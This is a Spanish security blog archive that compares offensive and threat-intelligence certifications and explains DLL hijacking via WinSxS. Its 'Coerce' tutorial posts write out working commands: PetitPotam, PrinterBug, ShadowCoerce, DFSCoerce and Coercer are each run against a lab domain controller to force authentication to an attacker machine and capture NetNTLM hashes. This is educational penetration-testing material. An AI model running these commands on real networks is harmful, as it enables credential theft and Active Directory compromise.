26 feb 2024

Análisis de Certificaciones de Ciberseguridad Ofensiva | Parte II

 


En la anterior entrega de Certificaciones de Ciberseguridad Ofensiva, estuvimos hablando sobre eJPT (Junior Penetration Tester) y  eWPT (Web Penetration Tester). Durante la entrega de hoy os contaremos qué otras posibilidades existen respecto a las Certificaciones de Ciberseguridad Ofensiva:

CRTP (Certified Red Team Professional)

Descripción

El CRTP (Certified Red Team Professional) de Altered Security es una certificación de Red Team en la que se evalúa la capacidad de una persona para comprometer entornos de Directorio Activo empresariales.

Público objetivo

Esta certificación está diseñada para personas que buscan adquirir los conocimientos necesarios para llevar a cabo ejercicios de Red Team y auditorías internas de seguridad. Sin embargo, también es una excelente opción para aquellos que simplemente deseen ampliar sus conocimientos en comprometer entornos de Directorio Activo empresariales.

Contenido

  • Enumeración de Directorio Activo: enumerar información útil como usuarios, grupos, pertenencia a grupos, equipos, propiedades de usuarios, confianzas, ACL, etc., para mapear rutas de ataque.
  • Escalada de privilegios local: escalar privilegios locales en máquinas Windows del dominio objetivo.
  • Escalada de privilegios de dominio: descubrir credenciales y sesiones de cuentas administradoras, aplicar técnicas clásicas como Kerberoast y sus variantes, identificar y explotar problemas de delegación, así como aprender a abusar de los privilegios de grupos protegidos.
  • Persistencia de dominio: explotar la funcionalidad de Kerberos para persistir con privilegios de administrador de dominio, falsificar tickets para llevar a cabo ataques como "Golden ticket" y "Silver ticket". Subvertir la autenticación a nivel de dominio con técnicas como "Skeleton key" y SSP personalizado.

Formato de examen

El CRTP es un examen de 24 horas que consiste en realizar una auditoría interna en un Directorio Activo desde una máquina Windows y con un usuario de dominio proporcionado. El objetivo del examen es lograr la ejecución de comandos en todas las máquinas, independientemente de si se poseen privilegios de administrador o no. En total, hay 5 máquinas, excluyendo la propia del examinado. Tras realizar la parte práctica, se dispone de 48 horas para enviar el informe.

Precio

Para poder realizar el examen, es necesario adquirir el curso de Altered Security, que ofrece tres opciones diferentes. La opción más asequible tiene un precio de 249$ e incluye 30 días de acceso al laboratorio, acceso de por vida al material del curso y un intento de examen.

La segunda opción tiene un precio de 379$ e incluye 60 días de acceso al laboratorio, acceso de por vida al material del curso y un intento de examen.

La tercera opción tiene un precio de 499$ e incluye 90 días de laboratorio, acceso de por vida al material del curso y un intento de examen.

Existe la posibilidad de adquirir un intento de examen adicional por 99$. Si se desea extender el acceso al laboratorio por 30 días, además de obtener otro intento de examen, es posible hacerlo por 199$.


OSCP (Offensive Security Certified Professional)

Descripción

El OSCP (Offensive Security Certified Professional) es una de las certificaciones más reconocidas en el mundo de la seguridad ofensiva. Es una certificación totalmente práctica con la que se aprenden metodologías de pentesting y el uso de herramientas que vienen incluidas en la distribución Kali Linux.

Público objetivo

Esta certificación no está diseñada para personas que están dando sus primeros pasos en el pentesting, a diferencia de otras como el eJPT. Está dirigida a personas que poseen un conocimiento técnico un poco más avanzado, ya sea a través de experiencia profesional o de haber dedicado tiempo a resolver desafíos en plataformas como TryHackMe o HackTheBox.

Contenido

  • Metodologías de pentesting: comprensión de la metodología de hacking ético y pentesting, incluyendo reconocimiento, enumeración, explotación, post-explotación e informes.
  • Fundamentos de Linux: conocimiento del sistema operativo Linux, interfaz de línea de comandos y sistema de ficheros.
  • Conceptos de Redes: comprensión de protocolos y conceptos de redes, incluyendo TCP/IP, enrutamiento y firewalls.
  • Seguridad de Aplicaciones Web: conocimiento de vulnerabilidades en aplicaciones web, incluyendo SQL injection, cross-site scripting (XSS) e inyección de comandos.
  • Seguridad de Windows: conocimiento de la seguridad del sistema operativo Windows, incluyendo cuentas de usuario, permisos de ficheros y Directorio Activo.
  • Desarrollo de Exploits: conocimiento de técnicas de desarrollo de exploits, incluyendo ingeniería inversa, lenguaje ensamblador y debugging.
  • Seguridad Wireless: comprensión de conceptos y vulnerabilidades en redes wireless.
  • Criptografía: comprensión de conceptos y técnicas criptográficas, incluyendo cifrado, descifrado y hashing.

Formato de examen

El examen se divide en dos partes: la fase de explotación y la elaboración del informe, cada una con una duración de 24 horas. La evaluación total consta de 100 puntos, siendo necesario obtener al menos 70 para aprobar. Los 100 puntos se dividen de la siguiente manera:

  • 60 puntos: 3 máquinas independientes, cada una con una puntuación de 20 puntos. Estos 20 puntos se dividen en 10 por conseguir acceso a la máquina y otros 10 por escalar privilegios y convertirse en administrador/root.
  • 40 puntos: entorno de directorio activo con 2 clientes y un controlador de dominio. Solamente se obtienen los puntos si se compromete el directorio activo al completo, sin posibilidad de obtener puntos parciales. Esto quiere decir que se obtienen 40 puntos o ninguno.

Además, aparte de los puntos que se obtengan en el examen, existe la posibilidad de obtener hasta 10 puntos adicionales si se completa lo siguiente:

  • 30 máquinas del laboratorio de preparación.
  • 80% de los ejercicios de cada categoría.

Precio

Para poder realizar el examen, es necesario adquirir el curso PEN-200 (PWK) de Offensive Security. La opción más barata tiene un precio de 1649$ e incluye 90 días de acceso al laboratorio y un intento de examen.

La suscripción Learn One tiene un precio de 2599$ al año y proporciona acceso al laboratorio por un año, así como dos intentos de examen. 

La suscripción Learn Unlimited tiene un precio de 5499$ al año e incluye todos los cursos de la biblioteca de entrenamiento de OffSec, además de intentos de examen ilimitados.


BSCP (Burp Suite Certified Practitioner)

Descripción

El BSCP (Burp Suite Certified Practitioner) es una certificación creada por los desarrolladores de Burp Suite, que es la herramienta por excelencia del pentesting web. Obtener esta certificación demuestra un conocimiento profundo de vulnerabilidades de aplicaciones web, la mentalidad correcta para explotarlas y, por supuesto, las habilidades necesarias con Burp Suite para llevar a cabo estas acciones.

Público objetivo

Esta certificación tiene un nivel de dificultad alto y está diseñada para personas que quieran dedicarse a pentesting de aplicaciones web de manera profesional. No es necesario poseer anteriormente ninguna certificación de pentesting web para poder adquirir el BSCP, pero es recomendable tener unos conocimientos mínimos sobre el funcionamiento de las aplicaciones web.

Contenido

El contenido de esta certificación son todos los módulos de la academia de PortSwigger:

  • Vulnerabilidades del lado del servidor:
    • Autenticación
    • Path traversal
    • Inyección de comandos
    • Vulnerabilidades de lógica de negocio
    • Revelación de información
    • Control de acceso
    • Vulnerabilidades de subida de ficheros
    • Condiciones de carrera
    • Server-side request forgery (SSRF)
    • Inyección XXE, SQL y NoSQL
    • Testeo de APIs


  • Vulnerabilidades del lado del cliente:
    • Cross-site scripting (XSS)
    • Cross-site request forgery (CSRF)
    • Cross-origin resource sharing (CORS)
    • Clickjacking
    • Vulnerabilidades DOM-based
    • WebSockets

Formato de examen

Se dispone de cuatro horas para vulnerar dos aplicaciones web, cada una compuesta por tres fases. En cada fase, se debe identificar una o más vulnerabilidades que deben ser explotadas para avanzar a la siguiente fase.

En la fase 1, se comienza como un usuario no autenticado con el objetivo de escalar a un usuario de bajos privilegios. Después, en la fase 2, se debe escalar a un usuario administrador, y finalmente, en la fase 3, el objetivo es leer un archivo del sistema.

Precio

Cada intento de examen tiene un coste de 89€. A diferencia de otras certificaciones, el BSCP no requiere comprar en conjunto el examen junto con un curso de formación, ya que la formación oficial es la academia de PortSwigger, la cual es gratuita.

Hay que tener en cuenta que para poder realizar el examen es necesario utilizar Burp Suite Professional, que tiene un precio de 449€.


Javier Martín, Analista de Ciberseguridad en Zerolynx.

19 feb 2024

Coerce | Parte II

 


¡Hola de nuevo a todos! Tal y como prometimos, continuamos con la saga de Coerce y en esta segunda parte seguimos comentando sobre otros RPC vulnerables:

MS-FSRVP

MS-FSRVP Es el Remote Procedure Call relacionado con el protocolo de servidor de archivos remotos VSS. Se utiliza para crear copias de recursos compartidos de archivos en un ordenador remoto y para facilitar a las aplicaciones de copia de seguridad la realización de copias de seguridad coherentes con la aplicación y la restauración de datos en recursos compartidos SMB2.

Cabe destacar que, para poder explotar esta vulnerabilidad, es necesario que el servidor tenga habilitado la característica “Servicio del agente VSS del servidor de archivos”. 



Cabe destacar que Microsoft saco dos parches de seguridad para su corrección el 14 de junio de 2022.

Comprobación

Al igual que en el caso de MS-RPRN, para comprobar utilizamos rpcdump de impacket si el RPC MS-FSRVP se encuentra habilitado:

python3 rpcdump.py @dc.corp.lab | grep 'MS-FSRVP'


Cabe destacar que existen más métodos para comprobar si dicho RPC está habilitado mediante otras herramientas y técnicas.

Explotación

Tras comprobar que el RPC denominado como “MS- FSRVP” está habilitado en la víctima, además de haber comprometido un usuario del dominio mediante otras vías, se procederá a la explotación del mismo mediante una PoC denominada como ShadowCoerce la cual tiene asignada el identificador CVE-2022-30154

Así mismo, para comprobar que se fuerza la autenticación correctamente, haremos uso del usuario “bob” con privilegios limitados en el dominio “dc.corp.lab”.

python shadowcoerce.py -d "CORP" -u "bob" -p "<Password>" attack_machine dc.corp.lab


Se puede observar la captura del hash NetNTLM en la herramienta Responder. 


MS-DFSNM


MS-DFSNM es el Remote Procedure Call relacionado con el Sistema de archivos distribuidos (DFS): Protocolo de gestión de espacios de nombres. Proporciona una interfaz RPC para administrar configuraciones DFS. 


Comprobación

Al igual que en el caso de MS-EFSR, haremos uso de la herramienta crackmapexec, a través de la ejecución del módulo “dfscoerce” y mediante el uso usuario “bob” con privilegios limitados en el dominio “dc.corp.lab”, para la comprobación de si el servidor es o no vulnerable, pero esta vez con un usuario del dominio previamente comprometido:

crackmapexec smb dc.corp.lab -d "corp.lab" -u "bob" -p "<Password>" -M dfscoerce


Cabe destacar que existen más métodos para comprobar si dicho RPC está habilitado mediante otras herramientas y técnicas.

Explotación

Tras comprobar que el controlador de dominio es vulnerable, se procederá a la explotación de del mismo mediante una PoC denominada como DFSCoerce la cual fue publicada en junio de 2022.

Así mismo, para comprobar que se fuerza la autenticación correctamente, haremos uso del usuario “bob” con privilegios limitados en el dominio “dc.corp.lab”.

python3 dfscoerce.py -d "CORP" -u "bob" -p "<password>" attack_machine dc.corp.lab


Se puede observar la captura del hash NetNTLM en la herramienta Responder.



Todos para uno y uno para todos


Coercer es una herramienta escrita en python la cual prueba múltiples métodos de realizar una "Coerce Authentication", además de incluir todos los descritos anteriormente.

Tiene tres modos de ejecución, scan, coerce y fuzz.  Un ejemplo de ejecución en modo scan sería el siguiente:

coercer scan -t dc.corp.lab -u "bob" -p "<contraseña>" -d "CORP.LAB"


Un ejemplo de ejecución en modo coerce sería el siguiente:

coercer coerce -l attack_machine -t dc.corp.lab -u "bob" -p "<contraseña>" -d "CORP.LAB"


Cheat Sheet 




12 feb 2024

Análisis de Certificaciones de Seguridad Ofensiva | Parte I


Las certificaciones juegan un papel crucial en el mundo de la ciberseguridad, cumpliendo dos funciones principales. En primer lugar, ayudan a adquirir conocimientos y habilidades en diversas áreas de la ciberseguridad y, en segundo lugar, proporcionan una manera de demostrar que se poseen esos conocimientos y habilidades. El problema es que, debido a la gran cantidad de certificaciones existentes hoy en día, elegir la adecuada puede resultar complicado.

En este artículo, exploraremos diferentes certificaciones que consideramos como opciones sólidas para aquellos que desean especializarse en el área de la seguridad ofensiva. Todas ellas son totalmente prácticas y su examen simula un escenario real en el que se deben comprometer diversos activos, ya que esta la mejor manera de demostrar que se poseen habilidades técnicas


eJPT (Junior Penetration Tester)


Descripción

La primera certificación de la lista es el eJPT (Junior Penetration Tester), de la entidad INE Security. Se trata de una certificación básica donde se valida que se posean los conocimientos, habilidades y capacidades necesarias para desempeñar el rol de un pentester junior.

Público objetivo

El eJPT es una certificación sencilla pensada para aquellos que se están introduciendo en el mundo del pentesting. Es importante destacar que, aunque se trata de una certificación de dificultad baja, se presupone que los candidatos poseen un conocimiento previo en redes y sistemas operativos.

Contenido

  • Metodologías de Evaluación: Encontrar sistemas en una red, identificar puertos abiertos, servicios y extraer información de una compañía de fuentes públicas. 
  • Pentesting de Hosts y Redes: Identificar vulnerabilidades en sistemas, identificar y modificar código de exploits, manejo de distintas herramientas como metasploit, realizar pivoting mediante port forwarding, realizar ataques de fuerza bruta y crackeo de hashes.
  • Pentesting de Aplicaciones Web: Identificar vulnerabilidades en aplicaciones web, enumerar ficheros y directorios ocultos y explotar vulnerabilidades web como Cross-Site Scripting (XSS) o SQL injection.
  • Auditoría de Hosts y Redes: Enumerar información de red y servicios a raíz de archivos encontrados en sistemas objetivo. Además, recopilar información de cuentas de usuario en sistemas objetivo y volcar hashes.

Formato de examen

El examen tiene una duración de 48 horas y consta de 35 preguntas de opción múltiple, cada una con 4 posibles respuestas, junto con un componente práctico de laboratorio. En el laboratorio se proporciona acceso a una máquina Kali Linux conectada a la red objetivo. La finalidad del examen es realizar un pentest de tipo Black Box (Caja Negra) a la red objetivo y a todas las redes internas a las que se tengan acceso durante el laboratorio. Durante la realización del examen, se permite el uso de todos los recursos que se quieran como apoyo. La puntuación del examen se mide en una escala de 100 puntos, siendo necesario alcanzar una calificación igual o superior a 70 para aprobar.

Precio

La opción de presentarse al examen está disponible en la página web de INE Security por 249$. Esta opción incluye dos oportunidades para aprobar el examen con hasta 180 días de diferencia entre los dos.
INE Security también ofrece un curso de preparación para el examen denominado PTS (Penetration Tester Student). Este curso está incluido en el Fundamental Pass, que forma parte de la suscripción estándar de su academia online. La tarifa mensual de suscripción es de 39$, mientras que la anual es de 299$.


eWPT (Web Penetration Tester)


Descripción

El eWPT de INE Security es una certificación de dificultad media que valida que una persona tenga los conocimientos, capacidades y habilidades necesarias para poder desempeñar el trabajo de un pentester más concretamente en aplicaciones web.

Público objetivo

La certificación está dirigida a aquellos con fundamentes básicos en redes, sistemas y pentesting que buscan perfeccionar sus habilidades en pentesting Web. Es adecuada, por ejemplo, para personas que han obtenido una certificación básica de pentesting como el eJPT y desean aumentar sus conocimientos en la parte de Web.

Contenido

  • Evaluar con precisión aplicaciones web según las prácticas metodológicas y estándares de la industria, identificando vulnerabilidades conforme a la guía de pruebas de seguridad web de OWASP.
  • Extraer información de sitios web mediante técnicas de reconocimiento pasivo y OSINT, así como de los dominios, subdominios y direcciones IP de una organización objetivo.
  • Examinar ficheros de metadatos de servidores web en busca de exposición de información y determinar el tipo, versión, tecnologías o frameworks utilizados en una aplicación web.
  • Analizar la estructura de aplicaciones web para identificar vectores de ataque potenciales y descubrir archivos y directorios ocultos no accesibles mediante navegación normal.
  • Identificar y aprovechar vulnerabilidades derivadas de la implementación incorrecta de métodos HTTP, así como de configuraciones erróneas en servidores web.
  • Testear aplicaciones web en busca de credenciales predeterminadas y contraseñas débiles, y sortear mecanismos de autenticación frágiles o rotos.
  • Identificar y aprovechar vulnerabilidades en la gestión de sesiones, así como explotar componentes de aplicaciones web vulnerables y desactualizados.
  • Realizar ataques de fuerza bruta contra formularios de inicio de sesión y aprovechar vulnerabilidades de inyección de comandos para la ejecución remota de código.
  • Identificar y aprovechar vulnerabilidades de XSS reflejado, almacenado, y de inyección SQL, así como vulnerabilidades en gestores de contenidos como por ejemplo WordPress.


Formato de examen

El examen se estructura en dos partes: una práctica y otra de redacción de informe, cada una con una duración de 7 días. En la parte práctica, se proporciona una "carta de compromiso", que es un documento con todos los detalles necesarios para llevar a cabo el examen. Durante esta etapa, se requiere comprometer distintas aplicaciones web.


Precio

La opción de presentarse al examen de la certificación eWPT junto con tres meses de formación está disponible en la página web de INE Security por 599$. No es posible realizar el examen sin adquirir también la formación.


Estad atentos porque próximamente os iremos contando más acerca de las certificaciones de seguridad ofensiva.

Javier Martín, analista de ciberseguridad en Zerolynx.

5 feb 2024

Coerce | Parte 1


Dentro del entorno de Active Directory, los atacantes recurren a autenticaciones forzadas y estrategias de MitM para llevar a cabo diversas acciones. Es por ello por lo que, en esta ocasión, entraremos en el tema de Coerce Authentication. A lo largo de diferentes posts explicaremos las diferentes formas de realizar esta técnica, además de como enlazarlo con otros ataques para elevar privilegios en un dominio.

“Coerce authentication” es una técnica que, mediante las llamadas a los Remote Procedure Calls (RPC) de Windows, fuerza a un servicio a que se autentique contra una máquina. Mediante esta técnica, un atacante puede forzar a servidor vulnerable a autenticarse contra una máquina controlada por el atacante y de esta forma, llegar a obtener el hash de la contraseña de la cuenta de máquina en formato NetNTLM.

Una cuenta de máquina en redes Windows se refiere a una identidad única asociada a un dispositivo en la red. Las cuentas de máquina son esenciales para establecer la comunicación y la colaboración entre dispositivos dentro de un entorno de red con sistemas operativos Windows.

Una vez obtenido el hash de la cuenta de una máquina, se abren un abanico de posibles técnicas para poder aprovechar esta autenticación para suplantar a la víctima. Parte de la criticidad de esta técnica, radica en que una máquina es la víctima. Por ejemplo, si esta técnica es utilizada contra un controlador de dominio, es posible llegar a comprometer la totalidad del dominio, elevando así la criticidad de dicha técnica.

¿Qué es RPC?

RPC son las siglas de Remote Procedure Call (Llamada a Procedimiento Remoto) la cual, es una forma de comunicación entre procesos (IPC). Esta tecnología permite a las aplicaciones enviarse señales entre sí para realizar una operación.

En los entornos Windows, se hace un uso intensivo de RPC para muchos servicios diferentes, como la programación de tareas, la creación de servicios, la configuración de impresoras, configuración de recursos compartidos, la gestión de datos cifrados almacenados de forma remota, entre otros…

Debido a la naturaleza de RPC como vector remoto, atrae mucha atención desde el punto de vista de la seguridad informática.

Principales RPC Vulnerables 

A continuación, se procede a enumerar los principales RPC vulnerables conocidos para el uso de la técnica “Coerce Authentication”.

Cabe destacar que, para la explotación de dichos RPC, es necesario tener una cuenta de un usuario del domino valida, aunque en el caso del RPC conocido como MS-EFSR, es posible llegar a ejecutarlo sin un usuario.

Para este segundo caso, donde la explotación era de forma anónima, Microsoft sí que ha considerado esto una vulnerabilidad y ha sacado parches de seguridad para su corrección.

MS-RPRN

MS-RPRN es el Remote Procedure Call relacionado con el protocolo de sistema de impresión remoto. 

Print Spooler de Microsoft es un servicio que gestiona los trabajos de impresión y otras tareas relacionadas con la impresión. Un atacante que controle un usuario/ordenador de dominio puede, con una llamada RPC específica, activar el servicio spooler de un objetivo que lo esté ejecutando y hacer que se autentique en un objetivo elegido por el atacante. Este comportamiento está marcado como “Wont Fix” desde Microsoft y está habilitado por defecto en todos los entornos Windows.

Comprobación

Para comprobar si un RPC está habilitado en el equipo de la víctima, se puede hacer uso de la herramienta rpcdump de impacket:

Comando: python3 rpcdump.py @dc.corp.lab | grep ‘MS-RPRN’

  



Cabe destacar que existen más métodos para comprobar si dicho RPC está habilitado mediante otras herramientas y técnicas.

Explotación


Tras comprobar que el RPC denominado como “MS-RPRN” está habilitado en la víctima, además de haber comprometido un usuario del dominio mediante otras vías, se procederá a la explotación del mismo mediante una PoC denominada como Printer Bug o SpoolSample la cual tiene asignada el identificador CVE-2021-34527. 

Así mismo, para comprobar que se fuerza la autenticación correctamente, haremos uso del usuario “bob” con privilegios limitados en el dominio “dc.corp.lab”.

Comando: python3 printerbug.py “CORP/bob:<password> @dc.corp.lab” attack_machine

Ilustración 2 – Explotación satisfactoria de printerbug.



Tras la explotación de la vulnerabilidad, se ha obtenido el hash netNTLMv2 de la cuenta de máquina del controlador de dominio. 

Ilustración 3 – Obtención hash NetNTLM.


MS-EFSR


MS-EFSR es el Remote Procedure Call relacionado con el protocolo de sistema de cifrado de ficheros remoto. Realiza operaciones de mantenimiento y gestión de datos cifrados que se almacenan de forma remota y a los que se accede a través de una red y está disponible como interfaz RPC.
Cabe destacar que originalmente este RPC era explotable de forma anónima, sin necesidad de haber comprometido previamente una cuenta de usuario del dominio. Es por ello por lo que Microsoft sacó dos parches de seguridad, tanto el 10 de agosto de 2021, como el 10 de mayo de 2022, los cuales se encargan de arreglar la posibilidad de poder realizar esta técnica sin un usuario del dominio.

Comprobación


En este caso, haremos uso de la herramienta crackmapexec, actualmente conocida como netexec, a través de la ejecución del módulo “petitpotam”, para la comprobación de forma anónima de si el servidor es o no vulnerable:

Comando: crackmapexec smb dc.corp.lab -M petitpotam

Ilustración 4 – Domain Controler vulnerable.

Cabe destacar que existen más métodos para comprobar si dicho RPC está habilitado mediante otras herramientas y técnicas.

Explotación


Tras comprobar que el controlador de dominio es vulnerable de forma anónima, se procederá a la explotación de del mismo mediante una PoC denominada como Petit Potam la cual tiene asignada dos identificadores CVE-2021-36942 y CVE-2022-26925.

Para comprobar que se fuerza la autenticación de forma anónima, ejecutaremos la PoC dejando los parámetros de usuario (-u), contraseña (-p) y dominio (-d) vacíos.

Comando: python3 PetitPotam.py -u “” -p “” -d “” attack_machine dc.corp.lab

Ilustración 5 – Explotación satisfactoria de PetitPotam.

Se puede observar la captura del hash NetNTLM en la herramienta Responder.

Ilustración 7 – Obtención hash NetNTLM.


En futuras entregas continuaremos hablando de otros RPC vulnerables, ¡Hasta la próxima! ¡Agur!

Dimas Pastor, Senior Analyst en Grupo Zerolynx.

29 ene 2024

Certificaciones de Ciberinteligencia

 


El concepto de inteligencia se ha ligado a numerosos ámbitos a lo largo de los años nombrando así nuevas áreas de conocimiento sobre temáticas muy variadas: psicología (inteligencia emocional), matemáticas (inteligencia de datos) o comercio (inteligencia de negocio), entre muchos otros. Este fenómeno estaría, en todo caso, determinado por la esencia de la palabra inteligencia en sí, y en concreto por su significado. Inteligencia supone la capacidad de entender, de resolver problemas, conocer y comprender.

El afán de conocimiento del ser humano se ha ido, por tanto, expandiendo a todos los campos del saber existentes y por existir. Este movimiento en pro del saber cabe destacar que no es una novedad y que concretamente los estados de la era modera pueden condecorarse como los primeros en establecer una serie de directrices y estándares en cuanto a su aprendizaje, aplicación y aprovechamiento. Siendo por ello, los servicios de inteligencia uno de los mejores ejemplos a seguir para la obtención de información y generación de inteligencia para las organizaciones.

Las metodologías y estructuras analíticas también se han ido desarrollando por parte de la sociedad civil en la empresa privada. Los servicios que ofrecen las empresas particularmente de ciberinteligencia, se basan en una esfera de conocimiento muy concreta, que contienen dentro una mucho mayor, la inteligencia.

La acreditación para los profesionales del sector de la ciberinteligencia supone por un lado la adquisición de conocimientos necesarios para la realización de su labor diaria y por otro el reconocimiento por parte de una institución privada de que ciertamente se poseen dichos conocimientos. En el sector, el conocimiento necesario para realizar los servicios dependerá del área particular sobre la que se trabaje, sin embargo, consideramos actualmente como algunas de las certificaciones más relevantes:

Certificaciones relativas a metodologías de obtención, OSINT (Open Source Intelligence)




Certified OSINT Expert (MOIS), Mossé Cyber Security Institute

  • Nivel: Principiante
  • Precio: 450$
  • Renovación: No requerida
La obtención de la certificación se realiza completando el 100% de los ejercicios que se presentan en los módulos. Estos módulos prácticos están separados por temáticas relacionadas con activos, redes sociales, filtraciones y entregables entre otros. No cuenta con límite de tiempo para su realización.




Certified in Open Source Intelligence (C|OSINT), McAfee

  • Nivel: Intermedio
  • Precio: 450$
  • Renovación: Cada 2 años, 125$
Las certificaciones de McAfee son accesibles acreditando educación superior o experiencia laboral en diversas áreas relacionadas con la obtención de información sin necesidad de realizar su training. Aunque en todas las certificaciones existen paquetes en las que se incluye la formación, un manual de estudio, ejercicios de preparación y el acceso al examen. Hay numerosas certificaciones relacionadas con cibertinteligencia, y puede que en algunas de ellas el temario sea similar. La certificación se obtiene obteniendo un 70% o más en el examen.





Open Source Intelligence Professional (OSIP), Inteltechniques

  • Nivel: Avanzado
  • Precio: 300$
  • Renovación: No requerida
La certificación requiere bien la realización del training, la acreditación de experiencia profesional en dicho campo. La practicidad de esta certificación puede suponer un reto para aquellos que no trabajen a diario con obtención en fuentes abiertas o no tengan experiencia previa. El examen de certificación se basa en la realización de una investigación con su entregable, con duración de máximo 10 días sobre un caso que propone un supuesto cliente. La evaluación se realizará sobre el entregable, esperándose de este un nivel profesional en cuanto a formato y contenido que podría ser solicitado por un cliente real.



GIAC Open Source Intelligence Certification (GOSI), GIAC

  • Nivel: Avanzado
  • Precio: 979$
  • Renovación: Cada 2 años, 479$
Las certificaciones de GIAC tienen asociados training de SANS, en este caso el SEC487. El curso de SANS se conforma sobre los conocimientos requeridos en el examen de la certificación, por lo que puede ser recomendable su realización. El examen de certificación consta de 75 preguntas y para su aprobación un 69% al menos.


Certificaciones relativas a actores y amenazas cibernéticas, CTI (Cyber Threat Intelligence)



Practitioner Threat Intelligence Analyst (CPTIA), CREST

  • Nivel: Principiante
  • Precio: £399
  • Renovación: Cada 3 años
El examen de certificación de CREST es extenso con un total de 120 preguntas con múltiple respuesta con un mínimo del 70% de aciertos para su aprobación (84 preguntas correctas). En él se evalúa el conocimiento sobre la recopilación y el análisis de información para la generación de inteligencia de amenazas, así como las habilidades y conocimientos básicas y áreas más específicas relacionas con los roles existentes. El precio de la certificación varía según el país, ya que el training necesario para acceder se ofrece por dos organizaciones distintas.


Certified Threat Intelligence Analyst (C|TIA), EC-Council

  • Nivel: Intermedio
  • Precio: 450$
  • Renovación: No requiere
Es posible acceder a la certificación realizando alguno de los trainings asociados a esta o bien acreditando experiencia profesional en el ámbito de la ciberseguridad, en cuyo caso habrá que abonar el precio de la solicitud de elegibilidad. El examen de certificación consta de 50 preguntas y para su aprobación requiere un mínimo del 70%. 





GIAC Cyber Threat Intelligence (GCTI), GIAC

  • Nivel: Avanzado
  • Precio: 979$
  • Renovación: 479$
Las certificaciones de GIAC tienen asociados training de SANS, en este caso el FOR578. El curso de SANS se conforma sobre los conocimientos requeridos en el examen de la certificación, por lo que puede ser recomendable su realización. El examen de certificación contiene de 75 a 82 preguntas y para su aprobación requiere un mínimo de 71%.




Certified Threat Intelligence Analyst (MTIA), Mossé Cyber Security Institute 

  • Nivel: Avanzado
  • Precio: 450$
  • Renovación: No requiere
La obtención de la certificación se realiza completando el 100% de los ejercicios que se presentan en los módulos. Estos módulos prácticos están separados por temáticas relacionadas con los fundamentos básicos, análisis de malware y contramedidas entre otros. No cuenta con límite de tiempo para su realización.




  • Nivel: Avanzado
  • Precio: 499$ por año
  • Renovación: No requiere
Esta certificación, como las demás ofrecidas por MITRE ATT&CK® desde el 1 de enero de 2024 se ofrecen exclusivamente en la plataforma MAD20™. Para su obtención, se requiere la suscripción anual y la aprobación de una serie de insignias propias del itinerario de la certificación a la que se opta. Una vez obtenidas todas las insignias necesarias, es posible acceder al examen final y con su aprobación conseguir la certificación. La suscripción tiene incluidas training online y asistencia a eventos.


Noelia B., Analista de Inteligencia en Zerolynx.

22 ene 2024

DLL Hijacking y WinSxS


En el año 2023, según un estudio publicado por Qualys, se registraron un total de 26,447 vulnerabilidades, mercando un hito como el año con la mayor cantidad de vulnerabilidades publicadas en la historia. Con el objetivo de comenzar el 2024 con una conciencia renovada sobre la importancia de la seguridad cibernética, es crucial estar al tanto de las nuevas amenazas que han surgido.

A pesar de que el secuestro de DLL es una vulnerabilidad de larga data, un reciente estudio de SecurityJoes ha identificado una nueva variación de esta técnica. Esta variante aprovecha los binarios presentes en la Carpeta WinSxS, lo que amplía las posibilidades para potenciales atacantes.

Carpeta WinSxS:

La carpeta WinSxS es un componente crítico del sistema, ya que es donde Windows almacena los archivos de las actualizaciones que se instalan, las copias de seguridad y puntos de restauración que el equipo genera automáticamente cada vez que se instala una nueva aplicación. Es por eso que el contenido de esta carpeta suele aumentar con el tiempo, ampliando así la superficie de ataque. Suele estar localizado en el directorio “C:\Windows\WinSxS”.

Bibliotecas de Vínculos Dinámicos (DLL):

Las DLLs son archivos que contiene código ejecutable y partes de software que se pueden usar por diferentes aplicaciones al mismo tiempo. Estos archivos, en el ecosistema de Windows, permiten la reutilización de funciones y recursos por diferentes programas sin necesidad de replicar el código, lo que optimiza el uso de memoria y facilita el desarrollo de software.

El secuestro de DLL capitaliza el método natural por el cual los programas de Windows buscan y acceden a las Bibliotecas de Vínculos Dinámicos (DLL). Este proceso sigue un orden específico para localizar las DLLs requeridas:

1. El directorio desde donde se ejecuta la aplicación

2. La carpeta C: Windows Syste m32

3. La carpeta C: Windows Syste m

4. La carpeta C: Windows

5. El directorio de trabajo actual

6. Directorios listados en la variable de entorno PATH del sistema.

7. Directorios listados en la variable de entorno PATH del usuario.

Cuando un atacante logra cargar una DLL maliciosa con el mismo nombre que una biblioteca dinámica legítima y esta versión maliciosa se encuentra antes en la secuencia de búsqueda que la versión auténtica, la aplicación carga la DLL maliciosa. Esto puede conducir a la ejecución de código arbitrario, lo que permite al atacante realizar acciones como el establecimiento de un "reverse shell", proporcionándole acceso remoto no autorizado al sistema comprometido. Windows, en su configuración por defecto, no realiza una verificación de autenticidad de las DLLs antes de cargarlas.

Comparado con los métodos tradicionales que implican subir un archivo ejecutable malicioso, en este caso se aprovechan varios ejecutables maliciosos presentes en la carpeta WinSxS para el secuestro de DLL. Esta técnica evita la escalada del privilegio para poder inyectar código malicioso, ya que se utilizan recursos legítimos del sistema. una ventaja adicional de este nuevo enfoque es que es más susceptible de pasar desapercibida por antivirus del sistema y que salten alerta sobre ello, ya que se emplean ejecutables legítimos del sistema para llevar a cabo acciones maliciosas, lo que reduce la posibilidad de detección al generar menos actividad sospechosa.




Si os ha parecido un tema interesante os dejamos un enlace sobre cómo evadir AMSI haciendo uso de DLL Hijacking y por si queréis repasar conceptos básicos sobre DLL Hijacking también podéis hacerlo.


Xuquiang Liu Xu, Pentester Jr. at Zerolynx.